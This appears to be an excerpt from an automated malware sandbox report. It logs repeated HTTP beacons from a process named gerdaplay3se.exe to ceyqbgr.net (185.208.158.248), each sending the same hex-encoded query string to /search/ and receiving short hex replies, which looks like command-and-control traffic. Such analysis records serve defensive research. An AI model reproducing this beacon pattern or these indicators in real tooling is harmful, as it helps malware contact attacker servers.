                                                                                Data Raw: 65 30 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 37 38 61 64 32 65 61 31 61 31 37 66 35 61 31 35 30 65 63 31 64 64 35 66 65 38 33 65 37 39 31 38 37 34 64 38 62 34 66 64 32 66 62 64 63 33 35 33 33 62 39 34 64 66 62 64 33 64 61 31 61 32 31 65 33 37 31 35 38 61 64 37 35 66 64 36 66 61 31 32 64 35 64 63 30 65 30 64 32 30 64 63 30 35 64 63 63 37 64 62 33 31 61 66 39 33 33 38 61 32 36 65 66 31 33 61 37 37 38 63 37 35 32 62 66 66 64 34 66 65 38 35 64 36 31 34 31 65 65 32 32 36 64 39 36 33 62 36 37 38 65 66 34 31 30 63 38 65 61 38 62 39 62 33 66 63 63 37 31 39 30 31 35 63 36 35 39 38 35 32 39 62 36 35 39 62 33 64 39 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e067b69c953804b26b565fe95b321bd19a55f78ad2ea1a17f5a150ec1dd5fe83e791874d8b4fd2fbdc3533b94dfbd3da1a21e37158ad75fd6fa12d5dc0e0d20dc05dcc7db31af9338a26ef13a778c752bffd4fe85d6141ee226d963b678ef410c8ea8b9b3fcc719015c6598529b659b3d90


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.657522185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:31:57.310273886 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:31:58.025355101 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:31:57 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.657523185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:31:58.337560892 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:31:59.024277925 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:31:58 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.657524185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:31:59.152204990 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:31:59.852696896 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:31:59 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.657526185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:31:59.981079102 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:00.689898014 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:00 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Sep 27, 2024 17:32:00.802612066 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:01.039459944 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:00 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Sep 27, 2024 17:32:01.147798061 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:01.393053055 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:01 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Sep 27, 2024 17:32:01.505816936 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:01.913379908 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:01 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Sep 27, 2024 17:32:02.021452904 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:02.267426014 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:02 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.657527185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:02.385979891 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:03.066957951 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:02 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Sep 27, 2024 17:32:03.177248001 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:03.418124914 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:03 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.657528185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:03.543560982 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:04.272787094 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:04 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.2.657529185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:04.487080097 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:05.215248108 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:05 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                8192.168.2.657530185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:05.341111898 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:06.018549919 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:05 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Sep 27, 2024 17:32:06.133611917 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:06.373557091 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:06 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                9192.168.2.657531185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:06.495858908 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:07.205893040 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:07 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                10192.168.2.657532185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:07.420233011 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:08.108875036 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:08 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                11192.168.2.657533185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:08.231808901 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:08.923155069 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:08 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                12192.168.2.657534185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:09.044361115 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:09.752852917 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:09 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                13192.168.2.657535185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:10.281172037 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:10.882915020 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:10 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                14192.168.2.657536185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:11.043915987 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:11.795059919 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:11 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                15192.168.2.657537185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:11.930565119 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:12.694988966 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:12 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Sep 27, 2024 17:32:12.802819014 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:13.253220081 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:13 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                16192.168.2.657538185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:13.451730967 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:14.186856985 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:14 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                17192.168.2.657539185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:14.309135914 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:15.019023895 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:14 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


